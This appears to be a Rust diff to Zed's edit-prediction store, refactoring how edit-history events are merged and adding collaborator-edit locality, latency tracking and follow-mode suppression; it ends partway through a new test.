use language::{BufferSnapshot, OffsetRangeExt};
-use language_model::{LlmApiToken, NeedsLlmTokenRefresh, RefreshLlmTokenListener};
+use language_model::{LlmApiToken, NeedsLlmTokenRefresh};
use project::{DisableAiSettings, Project, ProjectPath, WorktreeId};
use release_channel::AppVersion;
use semver::Version;
@@ -41,7 +41,7 @@ use settings::{
use std::collections::{VecDeque, hash_map};
use std::env;
use text::{AnchorRangeExt, Edit};
-use workspace::Workspace;
+use workspace::{AppState, Workspace};
use zeta_prompt::{ZetaFormat, ZetaPromptInput};
use std::mem;
@@ -75,6 +75,7 @@ pub mod zeta;
#[cfg(test)]
mod edit_prediction_tests;
+use crate::cursor_excerpt::expand_context_syntactically_then_linewise;
use crate::example_spec::ExampleSpec;
use crate::license_detection::LicenseDetectionWatcher;
use crate::mercury::Mercury;
@@ -99,8 +100,10 @@ actions!(
);
/// Maximum number of events to track.
-const EVENT_COUNT_MAX: usize = 6;
+const EVENT_COUNT_MAX: usize = 10;
const CHANGE_GROUPING_LINE_SPAN: u32 = 8;
+const EDIT_HISTORY_DIFF_SIZE_LIMIT: usize = 2048 * 3; // ~2048 tokens or ~50% of typical prompt budget
+const COLLABORATOR_EDIT_LOCALITY_CONTEXT_TOKENS: usize = 512;
const LAST_CHANGE_GROUPING_TIME: Duration = Duration::from_secs(1);
const ZED_PREDICT_DATA_COLLECTION_CHOICE: &str = "zed_predict_data_collection_choice";
const REJECT_REQUEST_DEBOUNCE: Duration = Duration::from_secs(15);
@@ -133,7 +136,6 @@ pub struct EditPredictionStore {
client: Arc<Client>,
user_store: Entity<UserStore>,
llm_token: LlmApiToken,
- _llm_token_subscription: Subscription,
_fetch_experiments_task: Task<()>,
projects: HashMap<EntityId, ProjectState>,
update_required: bool,
@@ -243,21 +245,31 @@ pub enum UserActionType {
pub struct StoredEvent {
pub event: Arc<zeta_prompt::Event>,
pub old_snapshot: TextBufferSnapshot,
- pub edit_range: Range<Anchor>,
+ pub new_snapshot_version: clock::Global,
+ pub total_edit_range: Range<Anchor>,
}
impl StoredEvent {
fn can_merge(
&self,
- next_old_event: &&&StoredEvent,
- new_snapshot: &TextBufferSnapshot,
- last_edit_range: &Range<Anchor>,
+ next_old_event: &StoredEvent,
+ latest_snapshot: &TextBufferSnapshot,
+ latest_edit_range: &Range<Anchor>,
) -> bool {
- // Events must be for the same buffer
+ // Events must be for the same buffer and be contiguous across included snapshots to be mergeable.
if self.old_snapshot.remote_id() != next_old_event.old_snapshot.remote_id() {
return false;
}
- if self.old_snapshot.remote_id() != new_snapshot.remote_id() {
+ if self.old_snapshot.remote_id() != latest_snapshot.remote_id() {
+ return false;
+ }
+ if self.new_snapshot_version != next_old_event.old_snapshot.version {
+ return false;
+ }
+ if !latest_snapshot
+ .version
+ .observed_all(&next_old_event.new_snapshot_version)
+ {
return false;
}
@@ -282,9 +294,9 @@ impl StoredEvent {
return false;
}
- let left_range = self.edit_range.to_point(new_snapshot);
- let right_range = next_old_event.edit_range.to_point(new_snapshot);
- let latest_range = last_edit_range.to_point(&new_snapshot);
+ let left_range = self.total_edit_range.to_point(latest_snapshot);
+ let right_range = next_old_event.total_edit_range.to_point(latest_snapshot);
+ let latest_range = latest_edit_range.to_point(latest_snapshot);
// Events near to the latest edit are not merged if their sources differ.
if lines_between_ranges(&left_range, &latest_range)
@@ -320,7 +332,7 @@ struct ProjectState {
registered_buffers: HashMap<gpui::EntityId, RegisteredBuffer>,
current_prediction: Option<CurrentEditPrediction>,
next_pending_prediction_id: usize,
- pending_predictions: ArrayVec<PendingPrediction, 2>,
+ pending_predictions: ArrayVec<PendingPrediction, 2, u8>,
debug_tx: Option<mpsc::UnboundedSender<DebugEvent>>,
last_edit_prediction_refresh: Option<(EntityId, Instant)>,
last_jump_prediction_refresh: Option<(EntityId, Instant)>,
@@ -374,6 +386,7 @@ impl ProjectState {
EditPredictionRejectReason::Canceled,
false,
None,
+ None,
cx,
);
})
@@ -402,6 +415,7 @@ struct CurrentEditPrediction {
pub prediction: EditPrediction,
pub was_shown: bool,
pub shown_with: Option<edit_prediction_types::SuggestionDisplayType>,
+ pub e2e_latency: std::time::Duration,
}
impl CurrentEditPrediction {
@@ -495,12 +509,14 @@ impl std::ops::Deref for BufferEditPrediction<'_> {
}
#[derive(Clone)]
+
struct PendingSettledPrediction {
request_id: EditPredictionId,
editable_anchor_range: Range<Anchor>,
example: Option<ExampleSpec>,
enqueued_at: Instant,
last_edit_at: Instant,
+ e2e_latency: std::time::Duration,
}
struct RegisteredBuffer {
@@ -517,7 +533,9 @@ struct LastEvent {
new_snapshot: TextBufferSnapshot,
old_file: Option<Arc<dyn File>>,
new_file: Option<Arc<dyn File>>,
- edit_range: Option<Range<Anchor>>,
+ latest_edit_range: Range<Anchor>,
+ total_edit_range: Range<Anchor>,
+ total_edit_range_at_last_pause_boundary: Option<Range<Anchor>>,
predicted: bool,
snapshot_after_last_editing_pause: Option<TextBufferSnapshot>,
last_edit_time: Option<Instant>,
@@ -543,8 +561,11 @@ impl LastEvent {
})
});
- let (diff, edit_range) =
- compute_diff_between_snapshots(&self.old_snapshot, &self.new_snapshot)?;
+ let (diff, edit_range) = compute_diff_between_snapshots_in_range(
+ &self.old_snapshot,
+ &self.new_snapshot,
+ &self.total_edit_range,
+ )?;
if path == old_path && diff.is_empty() {
None
@@ -557,9 +578,10 @@ impl LastEvent {
in_open_source_repo,
predicted: self.predicted,
}),
- edit_range: self.new_snapshot.anchor_before(edit_range.start)
- ..self.new_snapshot.anchor_before(edit_range.end),
old_snapshot: self.old_snapshot.clone(),
+ new_snapshot_version: self.new_snapshot.version.clone(),
+ total_edit_range: self.new_snapshot.anchor_before(edit_range.start)
+ ..self.new_snapshot.anchor_before(edit_range.end),
})
}
}
@@ -569,12 +591,28 @@ impl LastEvent {
return (self.clone(), None);
};
+ let total_edit_range_before_pause = self
+ .total_edit_range_at_last_pause_boundary
+ .clone()
+ .unwrap_or_else(|| self.total_edit_range.clone());
+
+ let Some(total_edit_range_after_pause) =
+ compute_total_edit_range_between_snapshots(boundary_snapshot, &self.new_snapshot)
+ else {
+ return (self.clone(), None);
+ };
+
+ let latest_edit_range_before_pause = total_edit_range_before_pause.clone();
+ let latest_edit_range_after_pause = total_edit_range_after_pause.clone();
+
let before = LastEvent {
old_snapshot: self.old_snapshot.clone(),
new_snapshot: boundary_snapshot.clone(),
old_file: self.old_file.clone(),
new_file: self.new_file.clone(),
- edit_range: None,
+ latest_edit_range: latest_edit_range_before_pause,
+ total_edit_range: total_edit_range_before_pause,
+ total_edit_range_at_last_pause_boundary: None,
predicted: self.predicted,
snapshot_after_last_editing_pause: None,
last_edit_time: self.last_edit_time,
@@ -585,7 +623,9 @@ impl LastEvent {
new_snapshot: self.new_snapshot.clone(),
old_file: self.old_file.clone(),
new_file: self.new_file.clone(),
- edit_range: None,
+ latest_edit_range: latest_edit_range_after_pause,
+ total_edit_range: total_edit_range_after_pause,
+ total_edit_range_at_last_pause_boundary: None,
predicted: self.predicted,
snapshot_after_last_editing_pause: None,
last_edit_time: self.last_edit_time,
@@ -595,21 +635,78 @@ impl LastEvent {
}
}
-pub(crate) fn compute_diff_between_snapshots(
+fn compute_total_edit_range_between_snapshots(
old_snapshot: &TextBufferSnapshot,
new_snapshot: &TextBufferSnapshot,
-) -> Option<(String, Range<Point>)> {
+) -> Option<Range<Anchor>> {
let edits: Vec<Edit<usize>> = new_snapshot
.edits_since::<usize>(&old_snapshot.version)
.collect();
let (first_edit, last_edit) = edits.first().zip(edits.last())?;
-
- let old_start_point = old_snapshot.offset_to_point(first_edit.old.start);
- let old_end_point = old_snapshot.offset_to_point(last_edit.old.end);
let new_start_point = new_snapshot.offset_to_point(first_edit.new.start);
let new_end_point = new_snapshot.offset_to_point(last_edit.new.end);
+ Some(new_snapshot.anchor_before(new_start_point)..new_snapshot.anchor_before(new_end_point))
+}
+
+fn compute_old_range_for_new_range(
+ old_snapshot: &TextBufferSnapshot,
+ new_snapshot: &TextBufferSnapshot,
+ total_edit_range: &Range<Anchor>,
+) -> Option<Range<Point>> {
+ let new_start_offset = total_edit_range.start.to_offset(new_snapshot);
+ let new_end_offset = total_edit_range.end.to_offset(new_snapshot);
+
+ let edits: Vec<Edit<usize>> = new_snapshot
+ .edits_since::<usize>(&old_snapshot.version)
+ .collect();
+ let mut old_start_offset = None;
+ let mut old_end_offset = None;
+ let mut delta: isize = 0;
+
+ for edit in &edits {
+ if old_start_offset.is_none() && new_start_offset <= edit.new.end {
+ old_start_offset = Some(if new_start_offset < edit.new.start {
+ new_start_offset.checked_add_signed(-delta)?
+ } else {
+ edit.old.start
+ });
+ }
+
+ if old_end_offset.is_none() && new_end_offset <= edit.new.end {
+ old_end_offset = Some(if new_end_offset < edit.new.start {
+ new_end_offset.checked_add_signed(-delta)?
+ } else {
+ edit.old.end
+ });
+ }
+
+ delta += edit.new.len() as isize - edit.old.len() as isize;
+ }
+
+ let old_start_offset =
+ old_start_offset.unwrap_or_else(|| new_start_offset.saturating_add_signed(-delta));
+ let old_end_offset =
+ old_end_offset.unwrap_or_else(|| new_end_offset.saturating_add_signed(-delta));
+
+ Some(
+ old_snapshot.offset_to_point(old_start_offset)
+ ..old_snapshot.offset_to_point(old_end_offset),
+ )
+}
+
+fn compute_diff_between_snapshots_in_range(
+ old_snapshot: &TextBufferSnapshot,
+ new_snapshot: &TextBufferSnapshot,
+ total_edit_range: &Range<Anchor>,
+) -> Option<(String, Range<Point>)> {
+ let new_start_point = total_edit_range.start.to_point(new_snapshot);
+ let new_end_point = total_edit_range.end.to_point(new_snapshot);
+ let old_range = compute_old_range_for_new_range(old_snapshot, new_snapshot, total_edit_range)?;
+ let old_start_point = old_range.start;
+ let old_end_point = old_range.end;
+
const CONTEXT_LINES: u32 = 3;
let old_context_start_row = old_start_point.row.saturating_sub(CONTEXT_LINES);
@@ -628,6 +725,12 @@ pub(crate) fn compute_diff_between_snapshots(
let old_edit_range = old_start_line_offset..old_end_line_offset;
let new_edit_range = new_start_line_offset..new_end_line_offset;
+ if new_edit_range.len() > EDIT_HISTORY_DIFF_SIZE_LIMIT
+ || old_edit_range.len() > EDIT_HISTORY_DIFF_SIZE_LIMIT
+ {
+ return None;
+ }
+
let old_region_text: String = old_snapshot.text_for_range(old_edit_range).collect();
let new_region_text: String = new_snapshot.text_for_range(new_edit_range).collect();
@@ -674,10 +777,9 @@ impl EditPredictionStore {
}
pub fn new(client: Arc<Client>, user_store: Entity<UserStore>, cx: &mut Context<Self>) -> Self {
- let refresh_llm_token_listener = RefreshLlmTokenListener::global(cx);
- let data_collection_choice = Self::load_data_collection_choice();
+ let data_collection_choice = Self::load_data_collection_choice(cx);
- let llm_token = LlmApiToken::default();
+ let llm_token = LlmApiToken::global(cx);
let (reject_tx, reject_rx) = mpsc::unbounded();
cx.background_spawn({
@@ -721,23 +823,6 @@ impl EditPredictionStore {
user_store,
llm_token,
_fetch_experiments_task: fetch_experiments_task,
- _llm_token_subscription: cx.subscribe(
- &refresh_llm_token_listener,
- |this, _listener, _event, cx| {
- let client = this.client.clone();
- let llm_token = this.llm_token.clone();
- let organization_id = this
- .user_store
- .read(cx)
- .current_organization()
- .map(|organization| organization.id.clone());
- cx.spawn(async move |_this, _cx| {
- llm_token.refresh(&client, organization_id).await?;
- anyhow::Ok(())
- })
- .detach_and_log_err(cx);
- },
- ),
update_required: false,
edit_prediction_model: EditPredictionModel::Zeta,
zeta2_raw_config: Self::zeta2_raw_config_from_env(),
@@ -893,6 +978,10 @@ impl EditPredictionStore {
self.mercury.api_token.read(cx).has_key()
}
+ pub fn mercury_has_payment_required_error(&self) -> bool {
+ self.mercury.has_payment_required_error()
+ }
+
pub fn clear_history(&mut self) {
for project_state in self.projects.values_mut() {
project_state.events.clear();
@@ -1217,10 +1306,12 @@ impl EditPredictionStore {
cx.subscribe(buffer, {
let project = project.downgrade();
move |this, buffer, event, cx| {
- if let language::BufferEvent::Edited = event
+ if let language::BufferEvent::Edited { is_local } = event
&& let Some(project) = project.upgrade()
{
- this.report_changes_for_buffer(&buffer, &project, false, cx);
+ this.report_changes_for_buffer(
+ &buffer, &project, false, *is_local, cx,
+ );
}
}
}),
@@ -1242,6 +1333,7 @@ impl EditPredictionStore {
buffer: &Entity<Buffer>,
project: &Entity<Project>,
is_predicted: bool,
+ is_local: bool,
cx: &mut Context<Self>,
) {
let project_state = self.get_or_init_project(project, cx);
@@ -1253,7 +1345,6 @@ impl EditPredictionStore {
if new_snapshot.version == registered_buffer.snapshot.version {
return;
}
-
let old_file = mem::replace(&mut registered_buffer.file, new_file.clone());
let old_snapshot = mem::replace(&mut registered_buffer.snapshot, new_snapshot.clone());
let mut num_edits = 0usize;
@@ -1286,32 +1377,64 @@ impl EditPredictionStore {
}
}
- let action_type = match (total_deleted, total_inserted, num_edits) {
- (0, ins, n) if ins == n => UserActionType::InsertChar,
- (0, _, _) => UserActionType::InsertSelection,
- (del, 0, n) if del == n => UserActionType::DeleteChar,
- (_, 0, _) => UserActionType::DeleteSelection,
- (_, ins, n) if ins == n => UserActionType::InsertChar,
- (_, _, _) => UserActionType::InsertSelection,
- };
+ let include_in_history = is_local
+ || collaborator_edit_overlaps_locality_region(
+ project_state,
+ project,
+ buffer,
+ &buf.snapshot(),
+ &edit_range,
+ cx,
+ );
- if let Some(offset) = last_offset {
- let point = new_snapshot.offset_to_point(offset);
- let timestamp_epoch_ms = SystemTime::now()
- .duration_since(UNIX_EPOCH)
- .map(|d| d.as_millis() as u64)
- .unwrap_or(0);
- project_state.record_user_action(UserActionRecord {
- action_type,
- buffer_id: buffer.entity_id(),
- line_number: point.row,
- offset,
- timestamp_epoch_ms,
- });
+ if is_local {
+ let action_type = match (total_deleted, total_inserted, num_edits) {
+ (0, ins, n) if ins == n => UserActionType::InsertChar,
+ (0, _, _) => UserActionType::InsertSelection,
+ (del, 0, n) if del == n => UserActionType::DeleteChar,
+ (_, 0, _) => UserActionType::DeleteSelection,
+ (_, ins, n) if ins == n => UserActionType::InsertChar,
+ (_, _, _) => UserActionType::InsertSelection,
+ };
+
+ if let Some(offset) = last_offset {
+ let point = new_snapshot.offset_to_point(offset);
+ let timestamp_epoch_ms = SystemTime::now()
+ .duration_since(UNIX_EPOCH)
+ .map(|d| d.as_millis() as u64)
+ .unwrap_or(0);
+ project_state.record_user_action(UserActionRecord {
+ action_type,
+ buffer_id: buffer.entity_id(),
+ line_number: point.row,
+ offset,
+ timestamp_epoch_ms,
+ });
+ }
}
+ if !include_in_history {
+ return;
+ }
+
+ let is_recordable_history_edit =
+ compute_diff_between_snapshots_in_range(&old_snapshot, &new_snapshot, &edit_range)
+ .is_some();
+
let events = &mut project_state.events;
+ if !is_recordable_history_edit {
+ if let Some(event) = project_state.last_event.take() {
+ if let Some(event) = event.finalize(&project_state.license_detection_watchers, cx) {
+ if events.len() + 1 >= EVENT_COUNT_MAX {
+ events.pop_front();
+ }
+ events.push_back(event);
+ }
+ }
+ return;
+ }
+
if let Some(last_event) = project_state.last_event.as_mut() {
let is_next_snapshot_of_same_buffer = old_snapshot.remote_id()
== last_event.new_snapshot.remote_id()
@@ -1321,15 +1444,10 @@ impl EditPredictionStore {
let should_coalesce = is_next_snapshot_of_same_buffer
&& !prediction_source_changed
- && last_event
- .edit_range
- .as_ref()
- .is_some_and(|last_edit_range| {
- lines_between_ranges(
- &edit_range.to_point(&new_snapshot),
- &last_edit_range.to_point(&new_snapshot),
- ) <= CHANGE_GROUPING_LINE_SPAN
- });
+ && lines_between_ranges(
+ &edit_range.to_point(&new_snapshot),
+ &last_event.latest_edit_range.to_point(&new_snapshot),
+ ) <= CHANGE_GROUPING_LINE_SPAN;
if should_coalesce {
let pause_elapsed = last_event
@@ -1339,9 +1457,13 @@ impl EditPredictionStore {
if pause_elapsed {
last_event.snapshot_after_last_editing_pause =
Some(last_event.new_snapshot.clone());
+ last_event.total_edit_range_at_last_pause_boundary =
+ Some(last_event.total_edit_range.clone());
}
- last_event.edit_range = Some(edit_range);
+ last_event.latest_edit_range = edit_range.clone();
+ last_event.total_edit_range =
+ merge_anchor_ranges(&last_event.total_edit_range, &edit_range, &new_snapshot);
last_event.new_snapshot = new_snapshot;
last_event.last_edit_time = Some(now);
return;
@@ -1364,7 +1486,9 @@ impl EditPredictionStore {
new_file,
old_snapshot,
new_snapshot,
- edit_range: Some(edit_range),
+ latest_edit_range: edit_range.clone(),
+ total_edit_range: edit_range,
+ total_edit_range_at_last_pause_boundary: None,
predicted: is_predicted,
snapshot_after_last_editing_pause: None,
last_edit_time: Some(now),
@@ -1420,7 +1544,13 @@ impl EditPredictionStore {
return;
};
- self.report_changes_for_buffer(¤t_prediction.prediction.buffer, project, true, cx);
+ self.report_changes_for_buffer(
+ ¤t_prediction.prediction.buffer,
+ project,
+ true,
+ true,
+ cx,
+ );
// can't hold &mut project_state ref across report_changes_for_buffer_call
let Some(project_state) = self.projects.get_mut(&project.entity_id()) else {
@@ -1583,6 +1713,7 @@ impl EditPredictionStore {
request_id = pending_prediction.request_id.0.clone(),
settled_editable_region,
example = pending_prediction.example.take(),
+ e2e_latency = pending_prediction.e2e_latency.as_millis(),
);
return false;
@@ -1612,6 +1743,7 @@ impl EditPredictionStore {
edited_buffer_snapshot: &BufferSnapshot,
editable_offset_range: Range<usize>,
example: Option<ExampleSpec>,
+ e2e_latency: std::time::Duration,
cx: &mut Context<Self>,
) {
let this = &mut *self;
@@ -1626,6 +1758,7 @@ impl EditPredictionStore {
editable_anchor_range: edited_buffer_snapshot
.anchor_range_around(editable_offset_range),
example,
+ e2e_latency,
enqueued_at: now,
last_edit_at: now,
});
@@ -1648,6 +1781,7 @@ impl EditPredictionStore {
reason,
prediction.was_shown,
model_version,
+ Some(prediction.e2e_latency),
cx,
);
}
@@ -1709,6 +1843,7 @@ impl EditPredictionStore {
reason: EditPredictionRejectReason,
was_shown: bool,
model_version: Option<String>,
+ e2e_latency: Option<std::time::Duration>,
cx: &App,
) {
match self.edit_prediction_model {
@@ -1732,6 +1867,7 @@ impl EditPredictionStore {
reason,
was_shown,
model_version,
+ e2e_latency_ms: e2e_latency.map(|latency| latency.as_millis()),
},
organization_id,
})
@@ -1809,6 +1945,10 @@ impl EditPredictionStore {
return;
}
+ if currently_following(&project, cx) {
+ return;
+ }
+
let Some(project_state) = self.projects.get_mut(&project.entity_id()) else {
return;
};
@@ -1901,6 +2041,7 @@ impl EditPredictionStore {
EditPredictionResult {
id: prediction_result.id,
prediction: Err(EditPredictionRejectReason::CurrentPreferred),
+ e2e_latency: prediction_result.e2e_latency,
}
},
PredictionRequestedBy::DiagnosticsUpdate,
@@ -1945,6 +2086,25 @@ impl EditPredictionStore {
pub const THROTTLE_TIMEOUT: Duration = Duration::from_millis(300);
}
+fn currently_following(project: &Entity<Project>, cx: &App) -> bool {
+ let Some(app_state) = AppState::try_global(cx).and_then(|app_state| app_state.upgrade()) else {
+ return false;
+ };
+
+ app_state
+ .workspace_store
+ .read(cx)
+ .workspaces()
+ .filter_map(|workspace| workspace.upgrade())
+ .any(|workspace| {
+ workspace.read(cx).project().entity_id() == project.entity_id()
+ && workspace
+ .read(cx)
+ .leader_for_pane(workspace.read(cx).active_pane())
+ .is_some()
+ })
+}
+
fn is_ep_store_provider(provider: EditPredictionProvider) -> bool {
match provider {
EditPredictionProvider::Zed
@@ -2014,11 +2174,12 @@ impl EditPredictionStore {
let project_state = this.get_or_init_project(&project, cx);
let throttle = *select_throttle(project_state, request_trigger);
+ let now = cx.background_executor().now();
throttle.and_then(|(last_entity, last_timestamp)| {
if throttle_entity != last_entity {
return None;
}
- (last_timestamp + throttle_timeout).checked_duration_since(Instant::now())
+ (last_timestamp + throttle_timeout).checked_duration_since(now)
})
})
.ok()
@@ -2046,7 +2207,7 @@ impl EditPredictionStore {
return;
}
- let new_refresh = (throttle_entity, Instant::now());
+ let new_refresh = (throttle_entity, cx.background_executor().now());
*select_throttle(project_state, request_trigger) = Some(new_refresh);
is_cancelled = false;
})
@@ -2079,6 +2240,7 @@ impl EditPredictionStore {
prediction,
was_shown: false,
shown_with: None,
+ e2e_latency: prediction_result.e2e_latency,
};
if let Some(current_prediction) =
@@ -2099,6 +2261,7 @@ impl EditPredictionStore {
EditPredictionRejectReason::CurrentPreferred,
false,
new_prediction.prediction.model_version,
+ Some(new_prediction.e2e_latency),
cx,
);
None
@@ -2113,6 +2276,7 @@ impl EditPredictionStore {
reject_reason,
false,
None,
+ Some(prediction_result.e2e_latency),
cx,
);
None
@@ -2147,18 +2311,24 @@ impl EditPredictionStore {
});
if project_state.pending_predictions.len() < max_pending_predictions {
- project_state.pending_predictions.push(PendingPrediction {
- id: pending_prediction_id,
- task,
- drop_on_cancel,
- });
+ project_state
+ .pending_predictions
+ .push(PendingPrediction {
+ id: pending_prediction_id,
+ task,
+ drop_on_cancel,
+ })
+ .unwrap();
} else {
let pending_prediction = project_state.pending_predictions.pop().unwrap();
- project_state.pending_predictions.push(PendingPrediction {
- id: pending_prediction_id,
- task,
- drop_on_cancel,
- });
+ project_state
+ .pending_predictions
+ .push(PendingPrediction {
+ id: pending_prediction_id,
+ task,
+ drop_on_cancel,
+ })
+ .unwrap();
project_state.cancel_pending_prediction(pending_prediction, cx);
}
}
@@ -2605,8 +2775,8 @@ impl EditPredictionStore {
self.data_collection_choice.is_enabled(cx)
}
- fn load_data_collection_choice() -> DataCollectionChoice {
- let choice = KEY_VALUE_STORE
+ fn load_data_collection_choice(cx: &App) -> DataCollectionChoice {
+ let choice = KeyValueStore::global(cx)
.read_kvp(ZED_PREDICT_DATA_COLLECTION_CHOICE)
.log_err()
.flatten();
@@ -2626,11 +2796,13 @@ impl EditPredictionStore {
self.data_collection_choice = self.data_collection_choice.toggle();
let new_choice = self.data_collection_choice;
let is_enabled = new_choice.is_enabled(cx);
- db::write_and_log(cx, move || {
- KEY_VALUE_STORE.write_kvp(
+ let kvp = KeyValueStore::global(cx);
+ db::write_and_log(cx, move || async move {
+ kvp.write_kvp(
ZED_PREDICT_DATA_COLLECTION_CHOICE.into(),
is_enabled.to_string(),
)
+ .await
});
}
@@ -2689,6 +2861,32 @@ impl EditPredictionStore {
}
}
+fn collaborator_edit_overlaps_locality_region(
+ project_state: &ProjectState,
+ project: &Entity<Project>,
+ buffer: &Entity<Buffer>,
+ snapshot: &BufferSnapshot,
+ edit_range: &Range<Anchor>,
+ cx: &App,
+) -> bool {
+ let Some((active_buffer, Some(position))) = project_state.active_buffer(project, cx) else {
+ return false;
+ };
+
+ if active_buffer.entity_id() != buffer.entity_id() {
+ return false;
+ }
+
+ let locality_point_range = expand_context_syntactically_then_linewise(
+ snapshot,
+ (position..position).to_point(snapshot),
+ COLLABORATOR_EDIT_LOCALITY_CONTEXT_TOKENS,
+ );
+ let locality_anchor_range = snapshot.anchor_range_around(locality_point_range);
+
+ edit_range.overlaps(&locality_anchor_range, snapshot)
+}
+
fn merge_trailing_events_if_needed(
events: &mut VecDeque<StoredEvent>,
end_snapshot: &TextBufferSnapshot,
@@ -2699,13 +2897,19 @@ fn merge_trailing_events_if_needed(
if last_event.old_snapshot.remote_id() != latest_snapshot.remote_id() {
return;
}
+ if !latest_snapshot
+ .version
+ .observed_all(&last_event.new_snapshot_version)
+ {
+ return;
+ }
}
let mut next_old_event = None;
let mut mergeable_count = 0;
for old_event in events.iter().rev() {
- if let Some(next_old_event) = &next_old_event
- && !old_event.can_merge(&next_old_event, latest_snapshot, latest_edit_range)
+ if let Some(next_old_event) = next_old_event
+ && !old_event.can_merge(next_old_event, latest_snapshot, latest_edit_range)
{
break;
}
@@ -2720,10 +2924,19 @@ fn merge_trailing_events_if_needed(
let mut events_to_merge = events.range(events.len() - mergeable_count..).peekable();
let oldest_event = events_to_merge.peek().unwrap();
let oldest_snapshot = oldest_event.old_snapshot.clone();
+ let newest_snapshot = end_snapshot;
+ let mut merged_edit_range = oldest_event.total_edit_range.clone();
- if let Some((diff, edited_range)) =
- compute_diff_between_snapshots(&oldest_snapshot, end_snapshot)
- {
+ for event in events.range(events.len() - mergeable_count + 1..) {
+ merged_edit_range =
+ merge_anchor_ranges(&merged_edit_range, &event.total_edit_range, latest_snapshot);
+ }
+
+ if let Some((diff, edit_range)) = compute_diff_between_snapshots_in_range(
+ &oldest_snapshot,
+ newest_snapshot,
+ &merged_edit_range,
+ ) {
let merged_event = match oldest_event.event.as_ref() {
zeta_prompt::Event::BufferChange {
old_path,
@@ -2747,8 +2960,9 @@ fn merge_trailing_events_if_needed(
}),
}),
old_snapshot: oldest_snapshot.clone(),
- edit_range: end_snapshot.anchor_before(edited_range.start)
- ..end_snapshot.anchor_before(edited_range.end),
+ new_snapshot_version: newest_snapshot.version.clone(),
+ total_edit_range: newest_snapshot.anchor_before(edit_range.start)
+ ..newest_snapshot.anchor_before(edit_range.end),
},
};
events.truncate(events.len() - mergeable_count);
@@ -2756,6 +2970,24 @@ fn merge_trailing_events_if_needed(
}
}
+fn merge_anchor_ranges(
+ left: &Range<Anchor>,
+ right: &Range<Anchor>,
+ snapshot: &TextBufferSnapshot,
+) -> Range<Anchor> {
+ let start = if left.start.cmp(&right.start, snapshot).is_le() {
+ left.start
+ } else {
+ right.start
+ };
+ let end = if left.end.cmp(&right.end, snapshot).is_ge() {
+ left.end
+ } else {
+ right.end
+ };
+ start..end
+}
+
#[derive(Error, Debug)]
#[error(
"You must update to Zed version {minimum_version} or higher to continue using edit predictions."
@@ -2806,12 +3038,13 @@ struct ZedPredictUpsell;
impl Dismissable for ZedPredictUpsell {
const KEY: &'static str = "dismissed-edit-predict-upsell";
- fn dismissed() -> bool {
+ fn dismissed(cx: &App) -> bool {
// To make this backwards compatible with older versions of Zed, we
// check if the user has seen the previous Edit Prediction Onboarding
// before, by checking the data collection choice which was written to
// the database once the user clicked on "Accept and Enable"
- if KEY_VALUE_STORE
+ let kvp = KeyValueStore::global(cx);
+ if kvp
.read_kvp(ZED_PREDICT_DATA_COLLECTION_CHOICE)
.log_err()
.is_some_and(|s| s.is_some())
@@ -2819,15 +3052,14 @@ impl Dismissable for ZedPredictUpsell {
return true;
}
- KEY_VALUE_STORE
- .read_kvp(Self::KEY)
+ kvp.read_kvp(Self::KEY)
.log_err()
.is_some_and(|s| s.is_some())
}
}
-pub fn should_show_upsell_modal() -> bool {
- !ZedPredictUpsell::dismissed()
+pub fn should_show_upsell_modal(cx: &App) -> bool {
+ !ZedPredictUpsell::dismissed(cx)
}
pub fn init(cx: &mut App) {
@@ -1,12 +1,14 @@
use super::*;
-use crate::{compute_diff_between_snapshots, udiff::apply_diff_to_string};
+use crate::udiff::apply_diff_to_string;
use client::{UserStore, test::FakeServer};
use clock::FakeSystemClock;
+use clock::ReplicaId;
use cloud_api_types::{CreateLlmTokenResponse, LlmToken};
use cloud_llm_client::{
EditPredictionRejectReason, EditPredictionRejection, RejectEditPredictionsBody,
predict_edits_v3::{PredictEditsV3Request, PredictEditsV3Response},
};
+
use futures::{
AsyncReadExt, FutureExt, StreamExt,
channel::{mpsc, oneshot},
@@ -18,26 +20,28 @@ use gpui::{
};
use indoc::indoc;
use language::{
- Anchor, Buffer, CursorShape, Diagnostic, DiagnosticEntry, DiagnosticSet, DiagnosticSeverity,
- Operation, Point, Selection, SelectionGoal,
+ Anchor, Buffer, Capability, CursorShape, Diagnostic, DiagnosticEntry, DiagnosticSet,
+ DiagnosticSeverity, Operation, Point, Selection, SelectionGoal,
};
+use language_model::RefreshLlmTokenListener;
use lsp::LanguageServerId;
use parking_lot::Mutex;
use pretty_assertions::{assert_eq, assert_matches};
use project::{FakeFs, Project};
use serde_json::json;
use settings::SettingsStore;
-use std::{path::Path, sync::Arc, time::Duration};
+use std::{ops::Range, path::Path, sync::Arc, time::Duration};
use util::{
path,
test::{TextRangeMarker, marked_text_ranges_by},
};
use uuid::Uuid;
+use workspace::{AppState, CollaboratorId, MultiWorkspace};
use zeta_prompt::ZetaPromptInput;
use crate::{
BufferEditPrediction, EDIT_PREDICTION_SETTLED_QUIESCENCE, EditPredictionId,
- EditPredictionStore, REJECT_REQUEST_DEBOUNCE,
+ EditPredictionJumpsFeatureFlag, EditPredictionStore, REJECT_REQUEST_DEBOUNCE,
};
#[gpui::test]
@@ -176,6 +180,172 @@ async fn test_current_state(cx: &mut TestAppContext) {
});
}
+#[gpui::test]
+async fn test_diagnostics_refresh_suppressed_while_following(cx: &mut TestAppContext) {
+ let (ep_store, mut requests) = init_test_with_fake_client(cx);
+
+ cx.update(|cx| {
+ cx.update_flags(
+ false,
+ vec![EditPredictionJumpsFeatureFlag::NAME.to_string()],
+ );
+ });
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "1.txt": "Hello!\nHow\nBye\n",
+ "2.txt": "Hola!\nComo\nAdios\n"
+ }),
+ )
+ .await;
+ let project = Project::test(fs, vec![path!("/root").as_ref()], cx).await;
+
+ let app_state = cx.update(|cx| {
+ let app_state = AppState::test(cx);
+ AppState::set_global(Arc::downgrade(&app_state), cx);
+ app_state
+ });
+
+ let multi_workspace =
+ cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = multi_workspace
+ .read_with(cx, |multi_workspace, _| multi_workspace.workspace().clone())
+ .unwrap();
+ cx.update(|cx| {
+ AppState::set_global(Arc::downgrade(workspace.read(cx).app_state()), cx);
+ });
+ let _ = app_state;
+
+ let buffer1 = project
+ .update(cx, |project, cx| {
+ let path = project.find_project_path(path!("root/1.txt"), cx).unwrap();
+ project.set_active_path(Some(path.clone()), cx);
+ project.open_buffer(path, cx)
+ })
+ .await
+ .unwrap();
+ let snapshot1 = buffer1.read_with(cx, |buffer, _cx| buffer.snapshot());
